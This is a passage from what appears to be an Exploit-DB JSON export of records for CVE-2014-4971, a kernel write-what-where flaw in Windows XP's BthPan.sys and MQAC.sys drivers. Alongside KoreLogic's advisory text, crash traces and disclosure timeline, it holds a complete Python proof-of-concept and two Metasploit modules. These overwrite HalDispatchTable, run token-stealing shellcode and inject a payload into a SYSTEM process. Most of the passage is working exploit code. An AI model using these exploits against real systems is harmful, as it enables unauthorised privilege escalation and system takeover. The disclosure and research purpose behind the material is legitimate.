0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print \"[+] HalDispatchTable+0x4 overwritten\"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34112/"}, {"lastseen": "2016-02-03T20:33:38", "description": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation. CVE-2014-4971. Local exploit for windows platform", "published": "2014-07-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "EDB-ID:34131", "href": "https://www.exploit-db.com/exploits/34131/", "sourceData": "\"\"\"\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any \"up-platform\" products. Says they\r\n are investigating embedded platforms. Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\"\"\"\r\n\r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack) \r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint \"[!] Could not open handle to BthPan\"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\n\"\"\"\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\"\"\"", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34131/"}, {"lastseen": "2016-02-03T20:38:00", "description": "MQAC.sys Arbitrary Write Privilege Escalation. CVE-2014-4971. Local exploit for win32 platform", "published": "2014-07-25T00:00:00", "type": "exploitdb", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "EDB-ID:34167", "href": "https://www.exploit-db.com/exploits/34167/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within the MQAC.sys module allows an attacker to\r\n overwrite an arbitrary location in kernel memory.\r\n\r\n This module will elevate itself to SYSTEM, then inject the payload\r\n into another SYSTEM process.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin', # original exploit and all the hard work\r\n 'Spencer McIntyre' # MSF module\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3',\r\n {\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ],\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'EDB', '34112' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]\r\n ],\r\n 'DisclosureDate'=> 'Jul 22 2014',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def find_sys_base(drvname)\r\n session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')\r\n session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])\r\n session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])\r\n results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)\r\n addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\")\r\n\r\n addresses.each do |address|\r\n results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)\r\n current_drvname = results['lpBaseName'][0..results['return'] - 1]\r\n if drvname == nil\r\n if current_drvname.downcase.include?('krnl')\r\n return [address, current_drvname]\r\n end\r\n elsif drvname == results['lpBaseName'][0..results['return'] - 1]\r\n return [address, current_drvname]\r\n end\r\n end\r\n end\r\n\r\n # Function borrowed from smart_hashdump\r\n def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end\r\n\r\n def open_device\r\n handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)\r\n if handle['return'] == 0\r\n print_error('Failed to open the \\\\\\\\.\\\\MQAC device')\r\n return nil\r\n end\r\n handle = handle['return']\r\n end\r\n\r\n def check\r\n handle = open_device\r\n if handle.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n os = sysinfo[\"OS\"]\r\n case os\r\n when /windows xp.*service pack 3/i\r\n return Exploit::CheckCode::Appears\r\n when /windows xp/i\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n if sysinfo[\"Architecture\"] =~ /wow64/i\r\n print_error(\"Running against WOW64 is not supported\")\r\n return\r\n elsif sysinfo[\"Architecture\"] =~ /x64/\r\n print_error(\"Running against 64-bit systems is not supported\")\r\n return\r\n end\r\n\r\n if is_system?\r\n print_error(\"This meterpreter session is already running as SYSTEM\")\r\n return\r\n end\r\n\r\n kernel_info = find_sys_base(nil)\r\n base_addr = 0xffff\r\n print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")\r\n\r\n handle = open_device\r\n return if handle.nil?\r\n\r\n this_proc = session.sys.process.open\r\n unless this_proc.memory.writable?(base_addr)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")\r\n end\r\n unless this_proc.memory.writable?(base_addr)\r\n print_error('Failed to properly allocate memory')\r\n this_proc.close\r\n return\r\n end\r\n\r\n hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)\r\n hKernel = hKernel['return']\r\n halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")\r\n halDispatchTable = halDispatchTable['return']\r\n halDispatchTable -= hKernel\r\n halDispatchTable += kernel_info[0]\r\n print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")\r\n\r\n tokenstealing = \"\\x52\" # push edx # Save edx on the stack\r\n tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack\r\n tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0\r\n tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD\r\n tokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS\r\n tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax\r\n tokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN\r\n tokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)\r\n tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================\r\n tokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX\r\n tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX\r\n tokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS\r\n tokenstealing << \"\\x5b\" # pop ebx # Restores ebx\r\n tokenstealing << \"\\x5a\" # pop edx # Restores edx\r\n tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!\r\n\r\n shellcode = make_nops(0x200) + tokenstealing\r\n this_proc.memory.write(0x1, shellcode)\r\n this_proc.close\r\n\r\n print_status(\"Triggering vulnerable IOCTL\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)\r\n result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\r\n\r\n unless is_system?\r\n print_error(\"Exploit failed\")\r\n return\r\n end\r\n\r\n proc = get_system_proc\r\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\r\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34167/"}, {"lastseen": "2016-02-04T00:20:53", "description": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation. CVE-2014-4971. Local exploit for win32 platform", "published": "2014-10-15T00:00:00", "type": "exploitdb", "title": "Microsoft Bluetooth Personal Area Networking - BthPan.sys Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-10-15T00:00:00", "id": "EDB-ID:34982", "href": "https://www.exploit-db.com/exploits/34982/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/local/windows_kernel'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::Local::WindowsKernel\r\n include Msf::Post::File\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\r\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\r\n into an arbitrary location. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\r\n NtQueryIntervalProfile.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\r\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Targets' =>\r\n [\r\n ['Windows XP SP3',\r\n {\r\n 'HaliQuerySystemInfo' => 0x16bba,\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ]\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\r\n [ 'OSVDB', '109387' ]\r\n ],\r\n 'DisclosureDate' => 'Jul 18 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n\r\n def ring0_shellcode\r\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\r\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\r\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\r\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\r\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\r\n tokenswap << [session.sys.process.getpid].pack('V')\r\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\r\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\r\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\r\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\r\n end\r\n\r\n def fill_memory(proc, address, length, content)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\r\n\r\n unless proc.memory.writable?(address)\r\n vprint_error(\"Failed to allocate memory\")\r\n return nil\r\n end\r\n vprint_good(\"#{address} is now writable\")\r\n\r\n result = proc.memory.write(address, content)\r\n\r\n if result.nil?\r\n vprint_error(\"Failed to write contents to memory\")\r\n return nil\r\n end\r\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\r\n\r\n return address\r\n end\r\n\r\n def disclose_addresses(t)\r\n addresses = {}\r\n\r\n hal_dispatch_table = find_haldispatchtable\r\n return nil if hal_dispatch_table.nil?\r\n addresses['halDispatchTable'] = hal_dispatch_table\r\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\r\n\r\n vprint_status('Getting the hal.dll base address...')\r\n hal_info = find_sys_base('hal.dll')\r\n if hal_info.nil?\r\n vprint_error('Failed to disclose hal.dll base address')\r\n return nil\r\n end\r\n hal_base = hal_info[0]\r\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\r\n\r\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\r\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\r\n\r\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\r\n addresses\r\n end\r\n\r\n def check\r\n if sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n os = sysinfo[\"OS\"]\r\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n return Exploit::CheckCode::Safe unless handle\r\n\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Exploit::Failure::None, 'Session is already elevated')\r\n end\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\")\r\n end\r\n\r\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\r\n if handle.nil?\r\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\r\n end\r\n\r\n my_target = targets[0]\r\n print_status(\"Disclosing the HalDispatchTable address...\")\r\n @addresses = disclose_addresses(my_target)\r\n if @addresses.nil?\r\n session.railgun.kernel32.CloseHandle(handle)\r\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\r\n else\r\n print_good(\"Address successfully disclosed.\")\r\n end\r\n\r\n print_status(\"Storing the shellcode in memory...\")\r\n this_proc = session.sys.process.open\r\n kernel_shell = ring0_shellcode\r\n kernel_shell_address = 0x1\r\n\r\n buf = \"\\x90\" * 